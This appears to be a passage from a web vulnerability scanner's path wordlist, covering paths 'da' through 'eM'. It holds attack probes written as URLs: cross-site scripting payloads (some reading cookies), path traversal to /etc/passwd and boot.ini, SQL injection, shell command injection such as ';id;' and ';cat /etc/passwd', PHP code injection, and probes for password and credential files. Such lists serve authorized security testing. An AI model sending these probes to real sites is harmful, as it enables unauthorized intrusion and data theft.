/data/inc/header.php?lang_kop5=%3Cscript%3Ealert%2810748%29%3C%2Fscript%3E
/data/inc/header.php?lang_modules=%3Cscript%3Ealert%2810742%29%3C%2Fscript%3E
/data/inc/header.php?pluck_version=%3Cscript%3Ealert%2810732%29%3C%2Fscript%3E
/data/inc/header.php?titelkop=%3Cscript%3Ealert%2810736%29%3C%2Fscript%3E
/data/inc/header.php?titelkop=%3Cscript%3Ealert%2810750%29%3C%2Fscript%3E
/data/inc/header2.php?pluck_version=%3Cscript%3Ealert%2810752%29%3C%2Fscript%3E
/data/inc/header2.php?titelkop=%3Cscript%3Ealert%2810754%29%3C%2Fscript%3E
/data/inc/themeinstall.php?lang_theme6=%3Cscript%3Ealert%2810756%29%3C%2Fscript%3E
/data/inc/themes/predefined_variables.php?blogpost=/../../../../../../../../boot.ini
/data/inc/themes/predefined_variables.php?blogpost=/../../../../../../../../etc/passwd
/data/inc/themes/predefined_variables.php?blogpost=/../../../../../../../../winnt/win.ini
/data/member_log.txt
/data/userlist.txt
/data/userlog/log.txt
/database
/database.inc
/database.nsf
/database.nsf/
/database.nsf/?OpenDatabase
/database.nsf/e1466a8590/6048076233?OpenDocument
/database.nsf/e146fa8590/6148076233?DeleteDocument
/database.nsf/e146fa8590/6148076233?EditDocument
/database.nsf/viewname?SearchView&Query=
/database.nsf?EditDocument
/database/
/database/comersus.mdb
/database/db2000.mdb
/database/kb.mdb
/database/metacart.mdb
/database/mpcsoftweb_photo.mdb
/database/Webmail.mdb
/database/WWGguestbook.mdb
/databases.php?plan_id=%27
/databases.php?plan_id=35&domain=%27
/databases/
/databases/Users.mdb
/databse.sql
/datafiles/
/datafunc.inc
/date
/date/
/dato/
/datos/
/day.php?cmd=ls
/day5datacopier.cgi
/day5datanotifier.cgi
/day5notifier.cgi
/db
/db.cgi
/db.dbf
/db.inc
/db.nsf
/db.nsf/?OpenDatabase
/db.sql
/db/
/db/gbdb.mdb
/db/Genit.dat
/db/oracle.php
/db/users.dat
/db2
/db2/
/db2www
/db2www.exe/../../db2www.ini
/db2www.ini
/db2www/../../db2www.ini
/db2www/library/document.d2w/report?uid=UNKNOWN&pwd=&search_type=SIMPLE&r_host=&last_page=db2www0022.html&fn=db2www.html
/db2_doc/html/db2srsen.exe
/DB4Web/
/DB4Web/10.10.10.10:100
/dba4.nsf
/dbabble?cmd="><script>alert(document.cookie)</script>
/dbase
/dbase/
/dbase/aeNovo1.mdb
/dbconfig.inc
/dbconn.inc
/dbm/
/dbman/
/dbman/db.cgi
/dbman/db.cgi?db=no-db
/dbman/db.cgi?db=tedb
/dbmlparser.exe
/dbms/
/dbs/
/dbsamp.htm
/db_manager.cgi
/dc/
/dc/auth_data/auth_user_file.txt
/dc/orders/orders.txt
/dcadmin.cgi
/dcboard.cgi
/dcboard.cgi?az=%27
/dcboard.cgi?az=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/dcboard.php?page=<script>alert(xss)</script>
/dcforms98.cgi
/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
/dcforum/
/dcforum/dcadmin.cgi
/dcforum/dcboard.cgi
/dcforum/dcforum.cgi
/dcforum/dcforum.cgi?az=list&file=../../../../../../../../../../etc/passwd%00
/dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
/dcforum/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd%00
/dcforum/install_help.cgi
/dcforumlib.pl
/dcguest.cgi
/dcguest/dcguest.cgi
/dclf.nsf
/dcshop/
/DCShop/auth_data/auth_user_file.txt
/dcshop/orders/orders.txt
/dc_Categoriesview.asp?key='
/dc_forum_Topicslist.asp?key_m='
/dd4c0d234c1759413d61cd84fb11eba8
/ddreport/
/ddrint
/ddrint/
/ddrint/bin/ddicgi.exe
/de/
/DEASAppDesign.nsf
/DEASLog.nsf
/DEASLog01.nsf
/DEASLog02.nsf
/DEASLog03.nsf
/DEASLog04.nsf
/DEASLog05.nsf
/debug-cgi
/debug.asp
/debug.bak
/debug.cfg
/debug.cgi
/debug.dat
/debug.htm
/debug.html
/debug.inc
/debug.jsp
/debug.log
/debug.php
/debug.php3
/debug.pl
/debug.txt
/debug/
/debugcgi
/decsadm.nsf
/decsdoc.nsf
/decslog.nsf
/DEESAdmin.nsf
/default
/default.asp
/default.asp%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htr
/default.asp%20.pl
/default.asp%3f.htr
/default.asp%81
/default.asp+.htr
/default.asp.
/default.asp. HTTP/1.0
/default.asp.+htr
/default.asp::$DATA
/default.asp?action=%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/default.asp?categoryID=24&UserLevel=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/default.asp?categoryID=24&UserLevel=2&SearchText=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/default.asp?catid=1234567890'
/default.asp?ExecuteTheLogin=1&Users_Email=%271%401.com&Users_Password=proofofconcept
/default.asp?layout=1%20order%20by%2012
/default.asp?msg=%3Cscript%3Ealert(%22xss%22)%3C/script%3E
/default.asp?pg=pgLogon&dest=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/Default.asp?Scheme=-1%27
/default.asp?setThemeColour=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/default.asp?skin_number=XSS.css%22%3E%3Cscript%3Ealert('xss404407102041')%3C/script%3E%3C
/default.asp?view=archives&month=%22generate_error&year=2004
/default.asp?view=plink&id=-1%27
/Default.aspx
/Default.aspx/"onmouseover="x='al';x='ert(xss)';eval(x);alert().aspx
/default.aspx/%22)%3b%7dif(xss)%7balert(10018
/default.aspx/~1
/Default.aspx?tabid=510&error=%22%3Cscript%3E%3C%2Fscript%3E%2F%3E%3Cimg%3Cscript%3E%3C%2Fscript%3Esrc%3D%22javascript%3Aalert%28xss%29%22%3E
/default.asp\\
/default.nsf
/default.nsf/?OpenDatabase
/default.php%20%20
/default.php3%20%20
/default.php?error_message=<script>alert('CSS')</script>
/default/
/DefaultWebApp/
/definesearch.jsp?searchwhat=<script>alert(xss)</script>
/deleteaccount.php
/deletecontact.php
/deletecontact.php?item_id=100+OR+TRUE+;
/delete_form.php?server_id=0&dn=%22%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/delete_forum.php?remove_site=1&cfg_dir=1&bn=1&ext=1&bn=&site_cfg_file=1
/deluxebb/index.php?limit='
/demo
/demo/
/demo/action.php?action=aff_mail&mail=14&sort=1&sortdir=1&lang=en
/demo/basic/simple/welcomeuser.jsp?user="><script>alert(097531)</script>
/demo/basic/simple/welcomeuser.jsp?user=%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/demo/dc_Categoriesview.asp??key='&RecPerPage=5
/demo/dc_Categoriesview.asp?key=%26dir%26
/demo/dc_forum_Postslist.asp?key_m='
/demo/dc_forum_Postslist.asp?psearch='&Submit=Search%20%28%2A%29&psearchtype=1
/demo/dc_forum_Postslist.asp?psearch=1&Submit=Search%20%28%2A%29&psearchtype='
/demo/dc_forum_Postslist.asp?start='
/demo/dc_productslist_Clearance.asp?cmd=%27
/demo/ojspext/events/globals.jsa
/demo/ratings.asp??PID='
/demo/sql/index.jsp
/demoauct/
/demomall/
/demomall/basemall.htm
/demos
/demos/
/deny
/deny/
/department/
/departments/
/deploy.exe
/descendancy.php?pid=<script>alert(document.cookie);</script>
/describecomponents.cgi
/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp%20&_SESSION[usr]=demo&_SESSION[apps][eyeOptions.eyeapp][wrapup]=echo%20md5("magic_string_060208");
/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION[usr]=demo&_SESSION[apps][eyeOptions.eyeapp][wrapup]=phpinfo();
/desktoplaunch/InfoView/logon/logon.object;jsessionid=7E1EFA4F83461F81157B67D7EA471A12?qryStr=&cmsVisible=true&authenticationVisible=true&referer=&refererFormData=&isFromLogonPage=true&cms=%3E%22%27%3E%3Cimg+src%3D%22javascript%3Aalert%2810472%29%22%3E%22
/detail.cfm?solus=%27
/detail.php?id=-1'
/detail.php?id=1009&contact=1&user_id=%27
/detail.php?listingid=-1/**/UNION/**/ALL/**/SELECT/**/1,CONCAT(0x32,0x30,0x30,0x38,0x30,0x35,0x32,0x31,0x20,0x46,0x65,0x65,0x64,0x62,0x61,0x63,0x6B,0x20,0x61,0x6E,0x64,0x20,0x52,0x61,0x74,0x69,0x6E,0x67,0x20,0x53,0x63,0x72,0x69,0x70,0x74,0x20,0x76,0x2E,0x32,0x30,0x30,0x38,0x2F,0x30,0x35,0x2F,0x32,0x31,0x20,0x28,0x6C,0x69,0x73,0x74,0x69,0x6E,0x67,0x69,0x64,0x29,0x20,0x53,0x51,0x4C,0x20,0x49,0x6E,0x6A,0x65,0x63,0x74,0x69,0x6F,0x6E),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/FROM/**/auto_admin_settings_tb/**/LIMIT+0,1/*
/detail/
/detailbw.html?mon=Jan%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E&year=2006&domain=XXX&target=XXX
/detailbw.html?mon=Jan&year=2006%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E&domain=XXX&target=XXX
/detailbw.html?mon=Jan&year=2006&domain=XXX%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E&target=XXX
/detailbw.html?mon=Jan&year=2006&domain=XXX&target=%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/details
/Details.cfm?ProdID=%27
/deu/
/dev
/dev/
/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00
/dev60cgi/rwcgi60
/dev60cgi/rwcgi60.exe
/dev60cgi/rwcgi60.exe/
/dev60cgi/rwcgi60/
/devel
/devel/
/develop/
/developer/
/development
/development/
/dfire.cgi
/dhtml/
/diagnose.cgi?<script>vulnerable
/diffs/
/dig.cgi
/dir.txt
/dir/
/dirassist.nsf
/directions.php?testID=\'
/directory.php
/directory.php?dir=%3Bcat%20/etc/passwd
/directory.php?dir=%3Bmore%20/etc/passwd
/directory/
/directory/gotopage.cgi?13686+/../../../../../../../../../../../../../../../../etc/passwd
/DirectoryListing.asp
/directorymanager/edit_image.php?dn=1&userfile=edit_image.php&userfile_name=%20;id;
/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00
/dirs.txt
/dirs/
/disk/
/disk/disk_prop.asp
/disk2server.cgi
/disks/
/diskusage.html?showtree=0%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/disk_c
/Display
/displaygame.php?filetype=1&gamefile=%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/displayTC.pl
/dist/
/distr/
/distrib/
/distribute/
/distribution/
/divx/
/dlisting.php?cid=1%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/dload.cgi?ID=14105
/dlsym/
/dm/
/dm/demarc
/dmailweb.exe?cmd=new&utoken=cerberus
/dmr
/dmr/
/dmr1/
/dms/
/dms/adminshares.kspx
/dms/aggrespy
/dms0
/dmsdump
/dm_jsp/
/dnewsweb.exe
/doc
/doc"><script>alert(097531);</script>
/doc-html/
/doc/
/doc/.access
/doc/.addressbook
/doc/.bashrc
/doc/.bash_history
/doc/.DS_Store
/doc/.FBCIndex
/doc/.forward
/doc/.htaccess
/doc/.htaccess.old
/doc/.htpasswd
/doc/.passwd
/doc//NoneExistent%0d%0aInjectedHeader043272
/doc//NoneExistent%0d%0aInjectedHeadernjectedValue
/doc//Sites/Knowledge/Membership/Inspired/ViewCode.asp?file=index.asp
/doc//Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp?file=index.asp
/doc//Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp?file=index.asp
/doc//Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp?file=index.asp
/doc//Sites/Samples/Knowledge/Push/ViewCode.asp?file=index.asp
/doc//Sites/Samples/Knowledge/Search/ViewCode.asp?file=index.asp
/doc//siteserver/publishing/viewcode.asp?file=index.asp
/doc//th1s1sanonexistantf1l3.1224703654
/doc/1030826680.jsp
/doc/1030826680.pl
/doc/1030826680.shtml
/doc/1047243590.dll
/doc/1061257343.lst
/doc/1150314288.bat
/doc/1180744951.db
/doc/1262710963.aspx
/doc/1620837561
/doc/1719388596.dbf
/doc/1742896439.old
/doc/1774327191/
/doc/178332740.data
/doc/1801354608.asp
/doc/1817771518.LOG
/doc/1852721844.log
/doc/1855293114.tcl
/doc/187826830.conf
/doc/187826830.pw
/doc/1937259126.show_query_columns
/doc/1953676036.do
/doc/208931516.showsource
/doc/2115036790.html
/doc/2124530880.sys
/doc/239362179.htx
/doc/260298752.php
/doc/314237258.cfm
/doc/35505402.inc
/doc/379786360.cgi
/doc/386709180.htm
/doc/642101306.cfg
/doc/651595396.signature
/doc/702962632.trc
/doc/716976385.dat
/doc/761588914.ini
/doc/798942397.exe
/doc/897325319.listprint
/doc/911339072.txt
/doc/934846915.c
/doc/96534841.axd
/doc/?M=A
/doc/access.log
/doc/access_log
/doc/accounts.asp
/doc/ackcmdc.exe
/doc/add_category.asp
/doc/admin.asp
/doc/admin.cfg
/doc/admin.cgi
/doc/admin.conf
/doc/admin.dat
/doc/admin.data
/doc/admin.db
/doc/admin.dbf
/doc/admin.exe
/doc/admin.htm
/doc/admin.html
/doc/admin.htx
/doc/admin.ini
/doc/admin.lst
/doc/admin.pl
/doc/admin.pw
/doc/admin.txt
/doc/admin/help1.php
/doc/admin/help8.php
/doc/admin/index.php
/doc/admin_/
/doc/admin_/help/..%255Cplsql.conf
/doc/admin_/help/1667853247.conf
/doc/adovbs.inc
/doc/application.cfm
/doc/asp/samples/viewcode.asp?file=index.asp
/doc/batch_add.asp
/doc/batch_manage.asp
/doc/ChangeLog
/doc/changelog.htm
/doc/CHANGELOG.html
/doc/changelog.txt
/doc/CHANGES
/doc/CHANGES.txt
/doc/changes.xml
/doc/changs.txt
/doc/cleanup.log
/doc/cleanup.txt
/doc/common.inc
/doc/config.inc
/doc/configuration.inc
/doc/Configure
/doc/CONFIGURE.txt
/doc/connect.inc
/doc/connection.inc
/doc/content-space
/doc/COPYRIGHT.txt
/doc/core
/doc/CreatedByHP5
/doc/customer.dbf
/doc/customers.dbf
/doc/CVS/576720317
/doc/CVS/Entries
/doc/CVS/Repository
/doc/CVS/Root
/doc/data.dbf
/doc/data.htm
/doc/data.html
/doc/data.txt
/doc/database.inc
/doc/datafunc.inc
/doc/db.dbf
/doc/db.inc
/doc/dbconfig.inc
/doc/dbconn.inc
/doc/dbsamp.htm
/doc/debug.asp
/doc/debug.cfg
/doc/debug.cgi
/doc/debug.dat
/doc/debug.htm
/doc/debug.html
/doc/debug.inc
/doc/debug.pl
/doc/debug.txt
/doc/Default.asp
/doc/Default.aspx
/doc/deploy.exe
/doc/dir.txt
/doc/dirs.txt
/doc/doexec.c
/doc/domguide.nsf
/doc/download.html
/doc/dspug.nsf
/doc/dspug.nsf/?OpenDatabase
/doc/dvwssr.dll
/doc/email.txt
/doc/email_list.txt
/doc/email_template.txt
/doc/env.log
/doc/error.log
/doc/errors.log
/doc/errors_log
/doc/error_log
/doc/fuck.exe
/doc/functions.inc
/doc/global.inc
/doc/help4.nsf
/doc/helpadmin.nsf
/doc/helpadmn.nsf/?OpenDatabase
/doc/helplt4.nsf
/doc/hobbit.txt
/doc/include.inc
/doc/index.php?cmd=ls%20-la&s=httpnexistent_test_host/inexistent.file.php%00
/doc/info.txt
/doc/info2.txt
/doc/INSTALL
/doc/install.htm
/doc/install.html
/doc/install.log
/doc/INSTALL.mysql.txt
/doc/INSTALL.pgsql.txt
/doc/INSTALL.txt
/doc/install.xml
/doc/internet.nsf
/doc/intranet.html
/doc/inventory.dbf
/doc/ipswitch.ini
/doc/javapg.nsf
/doc/javapg.nsf/?OpenDatabase
/doc/lccon.nsf
/doc/license.txt
/doc/localstart.asp
/doc/log.asp
/doc/log.cgi
/doc/log.htm
/doc/log.html
/doc/log.php
/doc/login.asp
/doc/Login.aspx
/doc/login.dbf
/doc/Login.do
/doc/logon.cgi
/doc/logon.htm
/doc/logon.html
/doc/logon.pl
/doc/logs.asp
/doc/logs.cgi
/doc/logs.htm
/doc/logs.html
/doc/logs.php
/doc/MAINTAINERS.txt
/doc/Makefile
/doc/members.dbf
/doc/migrate.nsf
/doc/mkilog.exe
/doc/nc.exe
/doc/netcat
/doc/netcat.c
/doc/netcat.exe
/doc/nph-test-cgi
/doc/npn_admn.nsf
/doc/npn_rn.nsf
/doc/ora_errs.log
/doc/orders.asp
/doc/orders.dat
/doc/orders.htm
/doc/orders.html
/doc/orders.txt
/doc/Output-Build.txt
/doc/owa_util.listprint
/doc/owa_util.showsource
/doc/owa_util.show_query_columns
/doc/owa_util.signature
/doc/packages
/doc/packages/
/doc/packages//th1s1sanonexistantf1l3.1224703654
/doc/pass.asp
/doc/pass.cfg
/doc/pass.cgi
/doc/pass.dat
/doc/pass.data
/doc/pass.db
/doc/pass.dbf
/doc/pass.exe
/doc/pass.htm
/doc/pass.html
/doc/pass.htx
/doc/pass.ini
/doc/pass.lst
/doc/pass.pl
/doc/pass.txt
/doc/passwd
/doc/passwd.txt
/doc/password
/doc/password.asp
/doc/password.cfg
/doc/password.cgi
/doc/password.dat
/doc/password.data
/doc/password.db
/doc/password.dbf
/doc/password.exe
/doc/password.htm
/doc/password.html
/doc/password.htx
/doc/password.ini
/doc/password.lst
/doc/password.pl
/doc/password.txt
/doc/passwords.asp
/doc/passwords.cfg
/doc/passwords.cgi
/doc/passwords.dat
/doc/passwords.data
/doc/passwords.db
/doc/passwords.dbf
/doc/passwords.exe
/doc/passwords.htm
/doc/passwords.html
/doc/passwords.htx
/doc/passwords.ini
/doc/passwords.lst
/doc/passwords.pl
/doc/passwords.txt
/doc/products.dbf
/doc/pubs.dbf
/doc/query.inc
/doc/Readme
/doc/README.htm
/doc/README.html
/doc/ReadMe.txt
/doc/readmec.nsf
/doc/readmes.nsf
/doc/root.exe
/doc/rt/overview-summary.html
/doc/samples/asp/viewcode.asp?file=index.asp
/doc/scripts/702962632.txt
/doc/scripts/comments.txt
/doc/security.dbf
/doc/sendmail.inc
/doc/server.log
/doc/servervar.asp
/doc/servervariables.asp
/doc/servervars.asp
/doc/services
/doc/servlet
/doc/sitelist.txt
/doc/sitestat.asp
/doc/sitestat.cgi
/doc/sitestat.htm
/doc/sitestat.html
/doc/sitestat.php
/doc/sitestats.asp
/doc/sitestats.cgi
/doc/sitestats.htm
/doc/sitestats.html
/doc/sitestats.php
/doc/site_mgmt.htm
/doc/site_mgmt.html
/doc/smhelp.nsf
/doc/sql.inc
/doc/sqlconnect.inc
/doc/sqlnet.log
/doc/sqlnet.trc
/doc/srvinst.nsf
/doc/srvinst.nsf/?OpenDatabase
/doc/ssl_error.log
/doc/ssl_error_log
/doc/standard.inc
/doc/stat.asp
/doc/stat.cgi
/doc/stat.htm
/doc/stat.html
/doc/stat.php
/doc/stat/
/doc/statistics.asp
/doc/statistics.cgi
/doc/statistics.htm
/doc/statistics.html
/doc/statistics.php
/doc/stats.asp
/doc/stats.cgi
/doc/stats.htm
/doc/stats.html
/doc/stats.php
/doc/Stats/
/doc/test-cgi
/doc/test-cgi.tcl
/doc/test-env
/doc/test.asp
/doc/test.aspx
/doc/test.bat
/doc/test.cgi
/doc/test.dbf
/doc/test.exe
/doc/test.htm
/doc/test.html
/doc/test.jsp
/doc/test.php
/doc/test.pl
/doc/test.shtml
/doc/test.txt
/doc/testing.asp
/doc/testing.cgi
/doc/testing.htm
/doc/testing.html
/doc/testing.txt
/doc/tmp
/doc/ToDo
/doc/ToDo.txt
/doc/Trace.axd
/doc/update.htm
/doc/update.html
/doc/upgrade.txt
/doc/usage.asp
/doc/usage.cgi
/doc/usage.htm
/doc/usage.html
/doc/usage.php
/doc/usage/
/doc/usage_200809.htm
/doc/usage_200809.html
/doc/usage_200810.htm
/doc/usage_200810.html
/doc/user.asp
/doc/user.cfg
/doc/user.cgi
/doc/user.dat
/doc/user.data
/doc/user.db
/doc/user.dbf
/doc/user.exe
/doc/user.htm
/doc/user.html
/doc/user.htx
/doc/user.ini
/doc/user.lst
/doc/user.pl
/doc/user.txt
/doc/users.asp
/doc/users.cfg
/doc/users.cgi
/doc/users.dat
/doc/users.data
/doc/users.db
/doc/users.dbf
/doc/users.exe
/doc/users.htm
/doc/users.html
/doc/users.htx
/doc/users.ini
/doc/users.lst
/doc/users.pl
/doc/users.txt
/doc/user_adm.html
/doc/utils.inc
/doc/validate.inc
/doc/viewcode.asp?file=index.asp
/doc/wdir.txt
/doc/wdirs.txt
/doc/webauthor.htm
/doc/webmin.config.notes
/doc/webstats.asp
/doc/webstats.cgi
/doc/webstats.html
/doc/webstats.php
/doc/wksinst.nsf/?OpenDatabase
/doc/WS_FTP.ini
/doc/WS_FTP.LOG
/doc/wwwstat.asp
/doc/wwwstat.php3
/doc/wwwstats.asp
/doc/wwwstats.cgi
/doc/wwwstats.htm
/doc/wwwstats.html
/doc/wwwstats.php
/doc/wwwstats.txt
/doc/wwwstats/
/doc/www_stats/
/doc/xferlog.txt
/doc/_root_.sys
/doc/_vti_cnf/
/doc1/
/doc11/
/docamples/
/docroot/
/docs
/docs/
/docs/index.php?lang=/../../../../../../../../../../etc/passwd%00
/docs/sdb/en/html/index.html
/docs/servlets/index.html
/docs/showtemp.cfm?TYPE=JPEG&FILE=../../../../../../../../../../../../../../../../../../boot.ini
/docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini
/docs/showtemp.cfm?TYPE=JPEG&FILE=ct.ini
/docs1/
/docs41/
/docs51/
/DocuColor/
/document/
/document/rqmkhtml.php?cmd=rqEditHtml&file=inexistent_file_name.php
/document/rqmkhtml.php?cmd=rqMkHtml&cwd=%22%3E%3Cscript%3Ealert%2810710%29%3C%2Fscript%3E
/documentation/
/documents/
/docushare/dsweb/ServicesLib/Group-#/%3cscript%3ealert(xss)%3c%2fscript%3e
/doc_Boa
/doc_Boa/
/dodelpop.html?email=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E&domain=XXX
/DoEditVotes.CGI
/doexec.c
/dohtaccess.html?dir=><script>alert(document.cookie);</script>
/doku.php
/doladmin.nsf
/doladmin.nsf/?OpenDatabase
/dols_help.nsf
/dom/
/domadmin.nsf
/domain/
/DomainFiles/
/DomainFiles/*//../../../../etc/passwd
/domains.asp?txtDomainName=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E%21&btnSubmit.x=0&btnSubmit.y=0
/domains.asp?txtDomainName=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E%5D
/domains.php?plan_id=%27
/domcfg
/domcfg.nsf
/domcfg.nsf/%3fopen
/domcfg.nsf/?open
/domcfg.nsf/?OpenDatabase
/domcfg.nsf/?OpenServer
/domcfg.nsf/URLRedirect/%3fOpenForm
/domcfg.nsf/URLRedirect/?OpenForm.
/domcfg.nsf/viewname%3fSearchView&Query="*"
/domguide.nsf
/domguide.nsf/?OpenDatabase
/domilocknoscan.nsf
/domino.nsf/?OpenDatabase
/domlog.nsf
/domlog.nsf/?Open
/domlog.nsf/?OpenDatabase
/door/
/dose.pl?daily&somefile.txt&|ls|
/dosearch.php?Cat=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/dostuff.php
/dostuff.php?action=modify_user
/DotNetNuke/
/dotproject/locales/core.php
/dotproject/locales/core.php?root_dir=/file_or_dir_path/%00
/dotproject/modules/files/index_table.php
/dotproject/modules/projects/addedit.php
/dotproject/modules/projects/view.php
/dotproject/modules/projects/vw_files.php
/dotproject/modules/tasks/addedit.php
/dotproject/modules/tasks/viewgantt.php
/double/
/down
/down/
/download
/download.cgi
/download.cgi?s=path&c=txt&f=fn
/download.html
/download.html?path=download.html
/download.php?list
/download.php?Number='
/download.php?op=viewdownload
/download.php?sortby=&dcategory=
/download.php?sortby=&dcategory=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E&sortby=
/download.php?sortby=&dcategory=<script>alert('vulnerable')</script>
/download.pl?s=path&c=txt&f=fn
/download/
/download2.php?fn1=download2.php
/downloading/
/downloads
/downloads/
/downloads/pafiledb.php?action=download&id=4?"<script>alert('Testing')</script>"
/downloads/pafiledb.php?action=download&id=4?\
/downloads/pafiledb.php?action=email&id=4?\
/downloads/pafiledb.php?action=rate&id=4?\
/downloadz/
/download_click.asp?downloadid=-1%27
/download_now.php?target=%27
/driver/
/drivers/
/dropbase.php?tabls=%27
/dropbox/
/drowssap
/dscgi/
/dscgi/admin.py/adminhome
/dsdn/dsweb/SearchResults/%3cscript%3ealert(xss)%3c%2fscript%3e
/dsdn/dsweb/Services/%3cscript%3ealert(xss)%3c%2fscript%3e
/dspug.nsf
/dump-env-cgi
/dump-env.cgi
/dump/
/dumpenv
/dumpenv-cgi
/dumpenv.cgi
/dumpenv.pl
/dumpenvcgi
/durep/
/dvwssr.dll
/dv_gbook.php?d=0&f=%27%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/Dynamics</html>%0d%0a
/Dynamics</html>%0d%0a&author=1&subject=1&match_forum=ALL&match_type=ALL&match_dates=30
/dyngb/
/dyngb/index.html
/e/
/e107_files/resetcore.php
/e107_plugins/alt_news/alt_news.php
/e107_plugins/backend_menu/backend_menu.php
/e107_plugins/clock_menu/clock_menu.php
/e107_plugins/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22);//--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/e107_plugins/counter_menu/counter_menu.php
/e107_plugins/login_menu/login_menu.php
/easylog
/easylog/
/easylog/easylog.html
/easylogs/
/eatme.ida
/eatme.idc
/eatme.idq
/eatme.idw
/eatme.pl
/ebriefs/
/ecartis/
/ecartus/
/echannel/
/echo.aspx?stringtext=<%00script>alert('CSS');</script>
/echo.bat
/echo.bat?&dir+c:\
/ecommerce/
/ecommerce/control/keywordsearch?SEARCH_STRING=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/Edit.jsp?page=Main&editor=%3Cscript%3Ealert%2810396%29%3C%2Fscript%3E
/Edit.jsp?page=Main&editor=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Frss
/edit.php?id=1&commentid=-99%27
/edit.php?s=%3Cscript%3Ealert%28980%29%3C/script%3E&submit=Search
/edit.pl
/edit.pl|edit.pl
/edit/Comment
/editCampaign.php?campaignId=
/editcss.php
/editor/filemanager/upload/php/upload.php?ServerPath=.\x.php.
/editpost.php?pid=1&GLOBALS%5B%5D=1&attachments=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/EditProjectIssue.do?projectIssueId=%22%3E%3Cscript%3Ealert(xss)%3C/script%3E%3C%22
/editquota.html?email=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E&domain=
/edit_image.php?dn=1&userfile=/etc/hosts&userfile_name=%20;ls;%20
/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name=%20;id;%20
/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name=%20;ls;%20
/edit_image.php?dn=1&userfile=edit_image.php&userfile_name=%20;id;
/EDM-ViewController-context-root/browse.do?act=%3CSCRIPT%3Ealert(xss);%3C/SCRIPT%3E&amp;select=1177281
/edmgui/
/edtalbum.asp?cat=&albumid=1&apage=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/eg/source.asp
/ejemplo/
/ejemplos/
/electronictransactions/
/email
/email.php?login=attacker&cer_skin=
/email.php?news.1
/email.txt
/email/
/emailfriend/emailarticle.php
/emailfriend/emailfaq.php
/emailfriend/emailnews.php
/emails/
/email_list.txt
/email_template.txt
/eManager
/eManager/
/eManager/cgi-bin/register.dll
/eManager/Content%20Management/SFNofitication.dll
/eManager/Email%20Management/cgi-bin/register.dll
/eManager/Email%20Management/cgi-bin/SpamExcp.dll
/eManager/Email%20Management/cgi-bin/spamrule.dll
/eManager/Email%20Management/cgi-bin/TOP10.dll
